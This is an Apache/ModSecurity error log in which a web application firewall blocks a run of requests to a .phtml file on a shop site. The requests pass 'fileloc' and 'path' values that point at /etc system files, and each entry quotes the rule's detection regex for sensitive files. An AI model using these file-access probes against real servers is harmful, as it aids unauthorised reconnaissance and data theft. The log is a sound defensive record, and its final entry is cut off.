[Fri Mar 20 08:55:31.405080 2026] [:error] [pid 15826:tid 140411691570944] [client 57.141.18.76:54910] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01s-oXxyEfFpUF8f-LVAAAAUY"]
[Fri Mar 20 08:55:31.850402 2026] [:error] [pid 7893:tid 140411649607424] [client 57.141.18.82:54916] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01sxCii7xarUs8iHZyNwAAAgs"]
[Fri Mar 20 08:55:32.314189 2026] [:error] [pid 11642:tid 140411725141760] [client 57.141.18.6:54926] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01tLninkcc-iUj5ApoPQAAA4I"]
[Fri Mar 20 08:55:32.495199 2026] [:error] [pid 7235:tid 140411540502272] [client 57.141.18.53:54928] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01tPqxLDW4GITHUkT0KgAAARg"]
[Fri Mar 20 08:55:32.873197 2026] [:error] [pid 11167:tid 140411616036608] [client 57.141.18.118:54934] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01tPHIg5MgXLBnicMBhAAAAc8"]
[Fri Mar 20 08:55:33.267914 2026] [:error] [pid 15826:tid 140411599251200] [client 57.141.18.123:54944] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01teoXxyEfFpUF8f-LVgAAAVE"]
[Fri Mar 20 08:55:33.697114 2026] [:error] [pid 31215:tid 140411649607424] [client 57.141.18.76:54948] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01tQF0L0L-SsrnPo5zoAAAAss"]
[Fri Mar 20 08:55:33.874359 2026] [:error] [pid 7235:tid 140411624429312] [client 57.141.18.115:54956] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01tfqxLDW4GITHUkT0KwAAAQ4"]
[Fri Mar 20 08:55:34.491601 2026] [:error] [pid 15826:tid 140411649607424] [client 57.141.18.38:54966] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01tuoXxyEfFpUF8f-LWAAAAUs"]
[Fri Mar 20 08:55:34.983821 2026] [:error] [pid 7893:tid 140411574073088] [client 57.141.18.99:54976] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01thCii7xarUs8iHZyOAAAAhQ"]
[Fri Mar 20 08:55:35.041243 2026] [:error] [pid 11642:tid 140411649607424] [client 57.141.18.14:54984] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01t7ninkcc-iUj5ApoQAAAA4s"]
[Fri Mar 20 08:55:35.495256 2026] [:error] [pid 9818:tid 140411548894976] [client 57.141.18.63:54992] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01t11pVZ5mVmJwsFM8cAAAAFc"]
[Fri Mar 20 08:55:36.109923 2026] [:error] [pid 11167:tid 140411691570944] [client 57.141.18.97:55004] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01uPHIg5MgXLBnicMBhQAAAcY"]
[Fri Mar 20 08:55:36.366421 2026] [:error] [pid 26799:tid 140411708356352] [client 57.141.18.31:55008] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01uNa6ubjKNq_cu4bg1AAAA0Q"]
[Fri Mar 20 08:55:36.733948 2026] [:error] [pid 9818:tid 140411599251200] [client 57.141.18.109:55014] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01uF1pVZ5mVmJwsFM8cQAAAFE"]
[Fri Mar 20 08:55:37.352000 2026] [:error] [pid 31215:tid 140411607643904] [client 57.141.18.18:55024] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01uQF0L0L-SsrnPo5zoQAAAtA"]
[Fri Mar 20 08:55:37.649226 2026] [:error] [pid 9818:tid 140411632822016] [client 57.141.18.120:55032] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01uV1pVZ5mVmJwsFM8cgAAAE0"]
[Fri Mar 20 08:55:38.416341 2026] [:error] [pid 9818:tid 140411725141760] [client 57.141.18.88:55042] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01ul1pVZ5mVmJwsFM8dAAAAEI"]
[Fri Mar 20 08:55:38.463783 2026] [:error] [pid 9818:tid 140411582465792] [client 57.141.18.61:55044] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01ul1pVZ5mVmJwsFM8dQAAAFM"]
[Fri Mar 20 08:55:38.556837 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.120:55046] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01uhCii7xarUs8iHZyOQAAAhY"]
[Fri Mar 20 08:55:39.160605 2026] [:error] [pid 11167:tid 140411641214720] [client 57.141.18.105:55058] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01u_HIg5MgXLBnicMBhgAAAcw"]
[Fri Mar 20 08:55:39.406381 2026] [:error] [pid 11167:tid 140411624429312] [client 57.141.18.4:55066] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01u_HIg5MgXLBnicMBhwAAAc4"]
[Fri Mar 20 08:55:39.690327 2026] [:error] [pid 11167:tid 140411683178240] [client 57.141.18.9:55074] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01u_HIg5MgXLBnicMBiAAAAcc"]
[Fri Mar 20 08:55:40.603021 2026] [:error] [pid 26799:tid 140411649607424] [client 57.141.18.72:55086] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01vNa6ubjKNq_cu4bg1QAAA0s"]
[Fri Mar 20 08:55:40.703751 2026] [:error] [pid 31215:tid 140411565680384] [client 57.141.18.45:55088] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01vAF0L0L-SsrnPo5zowAAAtU"]
[Fri Mar 20 08:55:40.704782 2026] [:error] [pid 31215:tid 140411565680384] [client 57.141.18.40:55090] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01vAF0L0L-SsrnPo5zpAAAAtU"]
[Fri Mar 20 08:55:41.380185 2026] [:error] [pid 7235:tid 140411632822016] [client 57.141.18.60:55100] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01vfqxLDW4GITHUkT0LgAAAQ0"]
[Fri Mar 20 08:55:41.513073 2026] [:error] [pid 7235:tid 140411708356352] [client 57.141.18.52:55106] [client 57.141.18.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01vfqxLDW4GITHUkT0LwAAAQQ"]
[Fri Mar 20 08:55:42.390328 2026] [:error] [pid 26799:tid 140411674785536] [client 57.141.18.80:55118] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] 